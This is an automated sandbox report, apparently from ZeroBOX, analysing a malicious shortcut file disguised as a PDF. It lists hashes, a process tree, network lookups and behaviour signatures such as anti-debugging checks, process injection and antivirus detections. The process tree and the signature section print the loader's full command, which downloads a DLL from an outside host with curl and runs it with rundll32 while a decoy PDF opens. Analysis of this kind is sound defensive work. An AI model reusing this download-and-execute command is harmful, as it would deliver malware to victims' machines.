Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 4, 2022, 10:10 a.m.	Oct. 4, 2022, 10:12 a.m.

Size	2.5KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=13, Archive, ctime=Sat Apr 17 18:24:50 2021, mtime=Tue Jul 19 22:32:27 2022, atime=Sat Apr 17 18:24:50 2021, length=289792, window=hidenormalshowminimized
MD5	`71a2a9192ecf4c96cc5046101b869882`
SHA256	`ea530601309c29a8667682c553888e0511512b88791d53611c75c61bfaf8f515`
CRC32	`31FC0060`
ssdeep	`48:8YbRXdGkkSYotlmS8dLXuHOyDzLFabEfcl:8YbDXtD0u1DzLFu`
Yara	Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "AdiuNNK" C:\Users\test22\AppData\Local\Temp\DetailsInfoPDF.pdf.lnk
3060
- cmd.exe "C:\Windows\System32\cmd.exe" /v:on /c curl.exe --ssl-no-revoke --no-progress-meter -o "C:\ProgramData\WinManaged.dll" https://ovonel.buzz/oPe/moa.php && rundll32.exe "C:\ProgramData\WinManaged.dll",WunTiskop
  2224
  - curl.exe curl.exe --ssl-no-revoke --no-progress-meter -o "C:\ProgramData\WinManaged.dll" https://ovonel.buzz/oPe/moa.php
    296
  - rundll32.exe rundll32.exe "C:\ProgramData\WinManaged.dll",WunTiskop
    3052
    - AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\ProgramData\Details.pdf"
      2812
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
ovonel.buzz	A 64.52.80.168	64.52.80.168

IP Address	Status	Action
164.124.101.2	Active	Moloch
64.52.80.168	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 4, 2022, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2022, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2022, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2022, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2022, 10:12 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 4, 2022, 10:11 a.m.			0	0

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	c:\program files\mozilla firefox\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 4, 2022, 10:11 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (3 events)

Time & API	Arguments	Status	Return
bind Oct. 4, 2022, 10:10 a.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Oct. 4, 2022, 10:10 a.m.	socket: 144 backlog: 1	1	0
accept Oct. 4, 2022, 10:10 a.m.	ip_address: socket: 144 port: 0	1	152

Allocates read-write-execute memory (usually to unpack itself) (20 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f23000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74001000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75571000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x753a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75281000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742f0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73cd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e12000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x741e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74361000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x741b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75231000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74bb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x759f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 3052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74b91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 2812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x713e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2022, 10:11 a.m.	process_identifier: 2812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ff63000 process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\ProgramData\Details.pdf

Creates executable files on the filesystem (1 event)

file	C:\ProgramData\WinManaged.dll

Creates a shortcut to an executable file (14 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\test22\AppData\Local\Temp\DetailsInfoPDF.pdf.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /v:on /c curl.exe --ssl-no-revoke --no-progress-meter -o "C:\ProgramData\WinManaged.dll" https://ovonel.buzz/oPe/moa.php && rundll32.exe "C:\ProgramData\WinManaged.dll",WunTiskop

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (30 events)

Time & API	Arguments	Status	Return
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: smss.exe process_identifier: 228	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: csrss.exe process_identifier: 364	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: svchost.exe process_identifier: 584	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: svchost.exe process_identifier: 656	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: svchost.exe process_identifier: 740	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: svchost.exe process_identifier: 796	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: audiodg.exe process_identifier: 916	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: svchost.exe process_identifier: 1000	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: spoolsv.exe process_identifier: 1036	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: svchost.exe process_identifier: 1080	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: dwm.exe process_identifier: 1208	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: taskhost.exe process_identifier: 1352	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: svchost.exe process_identifier: 1432	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: IMEDICTUPDATE.EXE process_identifier: 1492	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: svchost.exe process_identifier: 1908	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: pw.exe process_identifier: 1200	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: SearchIndexer.exe process_identifier: 736	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: SearchProtocolHost.exe process_identifier: 1364	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: SearchFilterHost.exe process_identifier: 2064	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: tvnserver.exe process_identifier: 2584	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: pw.exe process_identifier: 2696	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: taskhost.exe process_identifier: 2872	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: RdrCEF.exe process_identifier: 2404	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004ac process_name: RdrCEF.exe process_identifier: 3040	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004d0 process_name: RdrCEF.exe process_identifier: 1684	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004d0 process_name: cmd.exe process_identifier: 1728	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004d0 process_name: conhost.exe process_identifier: 1720	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004d0 process_name: pw.exe process_identifier: 2524	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004d4 process_name: RdrCEF.exe process_identifier: 2520	1	1
Process32NextW Oct. 4, 2022, 10:11 a.m.	snapshot_handle: 0x000004d4 process_name: RdrCEF.exe process_identifier: 2516	1	1

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Symantec	Scr.Mallnk!gen3
VBA32	Trojan.Link.DoubleRun
Zoner	Probably Heur.LNKScript
SentinelOne	Static AI - Suspicious LNK

Checks for the Locally Unique Identifier on the system for a suspicious privilege (32 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:11 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 4, 2022, 10:12 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (2 events)

Time & API	Arguments	Status	Return	Repeated
RegOpenKeyExW Oct. 4, 2022, 10:11 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x000001ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1	0	0
RegOpenKeyExW Oct. 4, 2022, 10:11 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x0000020c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1	0	0

Terminates another process (12 events)

Time & API	Arguments	Status
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 2404 process_handle: 0x0000049c
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 2404 process_handle: 0x0000049c	1
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 3040 process_handle: 0x0000049c
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 3040 process_handle: 0x0000049c	1
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 2452 process_handle: 0x000004ac
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 2452 process_handle: 0x000004ac	1
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 1684 process_handle: 0x000004ac
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 1684 process_handle: 0x000004ac	1
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 2520 process_handle: 0x000004ac
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 2520 process_handle: 0x000004ac	1
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 2516 process_handle: 0x000004ac
NtTerminateProcess Oct. 4, 2022, 10:11 a.m.	status_code: 0x00000000 process_identifier: 2516 process_handle: 0x000004ac	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\ProgramData\Details.pdf"
cmdline	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043

Drops a binary and executes it (1 event)

file	C:\ProgramData\Details.pdf

One or more non-whitelisted processes were created (1 event)

parent_process

acrord32.exe

martian_process

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3060 resumed a thread in remote process 2224
NtResumeThread Oct. 4, 2022, 10:10 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2224	1	0	0

DetailsInfoPDF.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All